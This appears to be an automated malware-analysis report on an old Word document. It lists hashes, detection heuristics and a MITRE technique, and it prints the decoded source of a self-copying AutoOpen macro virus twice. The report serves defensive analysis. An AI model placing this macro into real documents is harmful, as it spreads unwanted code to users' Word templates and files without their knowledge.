Office (OLE) malware analysis — malicious · 6094cbd7da5a1c0d

MALICIOUS

Office (OLE)

26.5 KB Created: 1998-05-03 14:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 631f8d077acc9157bb8fdbd455b13e9a SHA-1: 8d591095ab4ec83018a3ee74d7cff109941228e7 SHA-256: 6094cbd7da5a1c0d67d6fd8a914e223c2ebd24ff0f3e4beb363b60f7fb4c107f

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a legacy Word document containing a VBA macro named AutoOpen. This macro is designed to copy itself to the Normal.dot template or other documents, facilitating its spread. The presence of the AutoOpen macro and the legacy WordBasic marker strongly indicate a macro-based infection attempt.

Heuristics 4

ClamAV: Doc.Trojan.Example-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Example-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1004 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1004 bytes
SHA-256: `015f635282fe6c95a27105fd6edde3b19315ac124ee3cfb4a2cc78b9958517cf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "ExampleVirus" Sub AutoOpen() '1st line: if the active document's name is Normal then '2nd line: copy the macro ExampleVirus from the active document to the normal template; the macro is a project item '3rd line: but if the name of the active document ain't normal.dot then '4th line: copy the macro ExampleVirus from the notmal template to the active document; the macro is a project item If UCase(ThisDocument.Name) <> "NORMAL.DOT" Then Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "ExampleVirus", wdOrganizerObjectProjectItems Else Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "ExampleVirus", wdOrganizerObjectProjectItems End If End Sub

SHA-256: 015f635282fe6c95a27105fd6edde3b19315ac124ee3cfb4a2cc78b9958517cf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ExampleVirus"
Sub AutoOpen()
'1st line: if the active document's name is Normal then
'2nd line: copy the macro ExampleVirus from the active document to the normal template; the macro is a project item
'3rd line: but if the name of the active document ain't normal.dot then
'4th line: copy the macro ExampleVirus from the notmal template to the active document; the macro is a project item
If UCase(ThisDocument.Name) <> "NORMAL.DOT" Then
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "ExampleVirus", wdOrganizerObjectProjectItems
Else
Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "ExampleVirus", wdOrganizerObjectProjectItems
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.